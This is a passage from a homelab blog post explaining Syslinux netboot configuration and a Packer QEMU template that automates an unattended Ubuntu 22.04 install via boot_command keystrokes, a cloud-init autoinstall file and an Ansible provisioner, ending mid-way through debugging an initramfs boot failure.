<p>Here, the <code>client machine id</code> is a unique machine identifier. I have not been
able to figure out how to determine that value when booted into a machine. I had
to take it from the DNSmasq logs showing the files requested by the client.</p>
<p>The <code>HWTYPE</code> is the ARP hwtype, e.g. <code>01</code> for ethernet, with the rest being
the MAC address of the NIC.</p>
<p>The last possibility is the IPv4 address of the host in hex notation. The IP
address can also be provided in a partial form.
For example, a host with the IP <code>10.0.0.1</code> would use a config file at
<code>pxelinux.cfg/0a000001</code>, but also <code>pxelinux.cfg/0a00</code>. This way, different boot
configs can be provided for different subnets.</p>
<p>A Syslinux config file looks like this:</p>
<pre tabindex="0"><code>DEFAULT linux
LABEL linux
  KERNEL &lt;hostname&gt;/vmlinuz
  INITRD &lt;hostname&gt;/initrd.img
  APPEND boot=rbd rbdroot=10.0.0.1,10.0.0.2,10.0.0.3:clusteruser:&lt;ceph-key&gt;:pi-cluster:&lt;hostname&gt;::_netdev,noatime
</code></pre><p>These files are kept pretty simple. In my setup, the initrd and kernel image
are placed under a directory depending on the hostname, beneath the main netboot
directory configured as <code>tftp-root</code> in the DNSmasq config. So for example for a
host called sobek, the kernel would be placed at <code>/mnt/netboot/sobek/vmlinuz</code>.
The <code>APPEND</code> parameter contains the kernel command line parameters. So for my
Ceph RBD root device setup, that&rsquo;s the necessary options for mounting a RBD
volume.</p>
<p>So to recap, what happens during a boot of my Udoo:</p>
<ol>
<li>The host requests an IP address via DHCP, answered by my main firewall</li>
<li>The host requests netboot options, providing its unique client ID</li>
<li>My DNSmasq answers with itself as the TFTP server and the <code>syslinux.efi</code> file</li>
<li>The host downloads <code>syslinux.efi</code> via TFTP from my DNSmasq server and loads it</li>
<li>Syslinux checks for configuration files on the TFTP server</li>
<li>The only found config file, matching the unique client machine id of my Udoo,
is loaded by Syslinux</li>
<li>Syslinux loads the kernel from <code>hostname/vmlinuz</code> via TFTP</li>
<li>Syslinux loads <code>hostname/initrd</code> via TFTP and unpacks it</li>
</ol>
<p>After that sequence, the Kernel and initramfs take over, and the rest of
the boot follows the steps described in detail <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">here</a>.</p>
<h2 id="preparing-an-ubuntu-image-for-a-generic-machine">Preparing an Ubuntu image for a generic machine</h2>
<p>In my <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">previous article</a> I described
how to create an image for a Raspberry Pi 4. To do so, a special Packer builder
for ARM machines was used. This specific builder made use of the chroot command,
instead of creating a full VM and it used a preinstalled Ubuntu server image for
Raspberry Pis.</p>
<p>This time around, we&rsquo;re going to be using a different Packer builder, namely the
<a href="https://www.packer.io/plugins/builders/qemu">QEMU Builder</a>. The base approach
is still the same: Prepare the new machine, and then run a provisioner.
The provisioner has not changed at all here. It will be Ansible again, in fact
with the same playbook I used for the Pi setup previously.</p>
<p>The difference is how the Image is build: Instead of just downloading a
preinstalled image, the QEMU builder will create a fresh disk and allow you to
mount an install medium.</p>
<p>And then we arrive at the really funny part: It can automate the installation,
even if that installation requires inputs. &#x1f605;</p>
<p>The Packer template file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Host ID, e.g. HW ID for Pi or DHCP client-machine-id&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/imhotep&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/ceph/users/picluster&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-generic&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/22.04.1/ubuntu-22.04.1-live-server-amd64.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:10f19c5b2b8d6db711582e0e27f5116296c34fe4b313ba45f9b201a5007056cb&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;output_${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;echo &#39;packer&#39; | sudo -S shutdown -P now&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_username      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_password      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_timeout       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20m&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_handshake_attempts <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-generic&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;ansible_become_password<span style="color:#f92672">=</span><span style="color:#66d9ef">ubuntu</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--become&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    ansible_ssh_extra_args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;-o IdentitiesOnly<span style="color:#f92672">=</span><span style="color:#66d9ef">yes</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o HostkeyAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o PubkeyAcceptedAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>    use_sftp <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h3 id="the-qemu-builder">The QEMU builder</h3>
<p>Let&rsquo;s start with the builder part of the template:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-generic&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/22.04.1/ubuntu-22.04.1-live-server-amd64.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:10f19c5b2b8d6db711582e0e27f5116296c34fe4b313ba45f9b201a5007056cb&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;output_${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;echo &#39;packer&#39; | sudo -S shutdown -P now&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_username      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_password      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_timeout       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20m&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  ssh_handshake_attempts <span style="color:#f92672">=</span> <span style="color:#ae81ff">100</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The image being used here is Ubuntu&rsquo;s Server 22.04 install medium. It is
downloaded and mounted as a &ldquo;CD-ROM&rdquo; into the VM at boot. To automate the install
of Ubuntu, I&rsquo;m following <a href="https://ubuntu.com/server/docs/install/autoinstall-quickstart">these official instructions</a> to do a fully automated installation that does not ask any questions.</p>
<p>There are several steps necessary to achieve this:</p>
<ol>
<li>The boot medium kernel needs to be booted with specific parameters to enable
automatic install</li>
<li>A <em>cloud-init metadata file</em> needs to be provided. This file provides answers
to the questions which are normally asked interactively during an Ubuntu install</li>
</ol>
<p>Booting is the first hurdle, namely booting into the Ubuntu installer without
any manual intervention.</p>
<p>This is actually supported by Packer&rsquo;s QEMU builder, namely in the <code>boot_command</code>
option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;c&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;linux /casper/vmlinuz&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span></code></pre></div><p>This is the part which amused me to no end, when I was asking myself: How will I
be able to automate the changes in the Grub entries and finally found the answer.
What happens here: Packer will capture the stdin of the booting media (this is
still the Ubuntu install disk, not the finished image) and execute the commands
given in the <code>boot_command</code> option.</p>
<p>First, Packer waits a couple of moments and then starts with the input. It does
not read the screen or anything like that. Packer will simply input the
characters given in <code>boot_command</code> in the order given.</p>
<p>If you just boot up a VM with the Ubuntu Server live disk, you will see that the
first thing appearing is the Grub boot menu. Instead of using any entry from
there, the Packer setup will just enter Grub commands to start the boot. A console
can be opened in grub by pressing <code>c</code>. So that&rsquo;s exactly what happens here with
the very first input character: <code>c</code>. All of the <code>&lt;wait&gt;</code> entries just make the
system wait before the next input for about 1 second.</p>
<p>We&rsquo;re now on the Grub command line. The next command sets the Linux kernel
grub should use. This is simply the kernel from the installer. The boot files
for the installer are automatically mounted at <code>/casper</code>.
Next come the Linux kernel parameters. The first one, <code>autoinstall</code>, makes
Ubuntu run the automatic install instead of asking the user any questions.</p>
<p>The next option, which ends up as <code>ds=nocloud-net\\;s=http://{{.HTTPIP}}:{{.HTTPPort}}/</code>
defines the location of the config file for the automatic installation.</p>
<p>In this case, the QEMU builder has a neat little function, where it can start
an HTTP server locally, making it available to the booting VM, and serving
local files from there to the VM.
This server is configured in this part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>This defines the content served by the HTTP server. The value is a simple map
<code>string</code> =&gt; <code>string</code>. In this instance, I&rsquo;m using the <a href="https://www.packer.io/docs/templates/hcl_templates/functions/file/templatefile">templatefile</a> function.
It allows me to use a local file to serve from the HTTP server, instead of
defining the entire file to deliver in the Packer template file. Why? Because
I just don&rsquo;t like pasting multiline files in other files. If possible, I like
to keep separate files actually separately.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">autoinstall</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">identity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;${hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$6$exDY1mhS4KUYCE/2$zmn9ToZwTKLhCw.b4/b.ZRTIZM30JZ4QrOQ2aOXJ8yk96xpcCof0kxKwuX1kqLG/ygbJ1f8wxED22bTL4F46P0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">locale</span>: <span style="color:#ae81ff">en_US.UTF-8</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">layout</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">direct</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install-server</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">late-commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo &#39;ubuntu ALL=(ALL) NOPASSWD:ALL&#39; &gt; /target/etc/sudoers.d/sysuser</span>
</span></span></code></pre></div><p>The potential content of this file is described in the <a href="https://ubuntu.com/server/docs/install/autoinstall-reference">Ubuntu docs</a>.</p>
<p>One important thing to note: The comment <code>#cloud-config</code> at the beginning is
actually mandatory.</p>
<p>The <code>password</code> is the password for the initial user, which I have just called
<code>ubuntu</code>. The password is actually also <code>ubuntu</code> here, just already hashed for
direct input into the passwd file.</p>
<p>For the storage definition, I did not want to do anything too complicated, so
I just went with <code>default</code>. This default config gives you pretty much what you
would expect: A couple of hundred MB as the <code>/boot</code> partition, and the rest of
the disk formatted as ext4 as the root disk.</p>
<p>In addition, the <code>install-server</code> directive will install an SSH server.</p>
<p>Finally, highly important: Do not forget the last command under <code>late-command</code>.
This entry adds the newly created <code>ubuntu</code> user as a sudoer. This is especially
important to remember when, like me, you are coming from using a preinstalled
Raspberry Pi Ubuntu image. In those images, the <code>ubuntu</code> user is already
installed and it is automatically added as a sudoer. Here, we need to do that
manually.</p>
<p>After the kernel command line is defined, the initrd is configured, again
just to the standard initrd. Finally, the <code>boot</code> command is entered, which makes
grub take the previously entered configuration and try to boot it.</p>
<p>Here was where I hit the next couple of problems. I saw a kernel panic at the
bottom of the boot output. Something about <code>unable to start init</code>. This indicates
that everything might be fine with the kernel, but something went wrong with
unpacking the initramfs. But I could not see anything more. For some reason,
the system did not react to my attempts at scrolling up, and the VM was launching
in a very low resolution - there was not very much of the console output visible.</p>
<p>Solving this again lead me into an area of Linux I had had no reason to
explore in the past: Grub arguments and commands.</p>
<p>Before being able to fix the actual <em>no working init</em> problem, I need to see
whether there are some other indications about what went wrong with the initramfs.
To do so, we can use the grub config option <code>gfxpayload</code>. This option can be
set either in the Grub config (which you can access in grub itself when pressing <code>e</code>)
or it can be entered in the Grub console, after pressing <code>c</code>.
The potential values for that option can be seen by entering the Grub
console with <code>c</code> and entering <code>vbeinfo</code>.</p>
<p>One example which should work for most modern machines is <code>gfxpayload=1024x728x8</code>.</p>
<p>After that, I was finally able to see the real problem: I was seeing I/O errors
when the system tries to unpack the initramfs. First, I thought that was because
I was working on a NFS as my working directory. But then I took a look at the
